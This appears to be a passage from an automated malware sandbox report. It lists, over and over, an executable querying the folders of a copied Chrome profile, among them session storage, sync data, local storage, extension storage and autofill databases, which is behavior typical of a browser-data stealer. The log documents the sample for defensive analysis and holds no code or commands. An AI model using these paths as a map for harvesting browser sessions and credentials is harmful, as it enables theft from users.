Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sessions VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync App Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Extension Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\Manifest Resources VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\coupon_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\optimization_guide_model_metadata_store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync App Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\Manifest Resources VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\FileTypePolicies VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\FirstPartySetsPreloaded VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker\EventDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\PersistentOriginTrials VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sessions VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync App Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Extension Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\WebStorage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\commerce_subscription_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\databases VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\FileTypePolicies VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\MEIPreload VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\OptimizationGuidePredictionModels VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\OriginTrials VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\PKIMetadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\RecoveryImproved VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\SSLErrorAssistant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\SafetyTips VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Subresource Filter VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Subresource Filter\Unindexed Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\ThirdPartyModuleList64 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\databases VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform\SegmentInfoDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform\SignalDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sessions VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak VolumeInformation	Jump to behavior
